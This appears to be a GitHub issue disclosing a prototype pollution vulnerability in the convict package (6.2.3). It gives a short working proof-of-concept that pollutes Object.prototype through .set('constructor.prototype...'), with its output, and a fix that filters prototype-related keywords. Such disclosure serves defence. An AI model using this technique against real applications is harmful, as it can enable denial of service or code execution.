Bug - Prototype Pollution on .set() #410
Description
Convict is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
Create the following PoC file:
- index.js
const convict = require("convict"); //6.2.3
let obj = {}; const config = convict(obj);
console.log({}.polluted) //undefined
config.set("constructor.prototype.polluted", "polluted1");
let a= {}
console.log(a.polluted) //polluted1
Run> node index.js
Output
undefined
polluted1
💻 Technical Description *
Fix implemented by not allowing to modify object prototype.
Filter out all keywords and check for vulnerable instances like constructor | __proto__ | prototype
Expolit Image
